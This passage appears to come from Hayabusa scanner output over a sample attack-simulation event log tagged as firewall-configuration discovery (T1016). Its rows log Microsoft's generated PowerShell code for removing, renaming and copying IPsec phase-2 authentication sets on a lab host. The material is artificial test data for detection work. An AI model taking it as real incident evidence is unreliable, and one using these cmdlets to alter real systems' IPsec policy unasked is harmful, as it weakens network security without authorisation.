.EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase2AuthSet' function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase2AuthSet' function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase2AuthSet' function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] $",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"{NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains 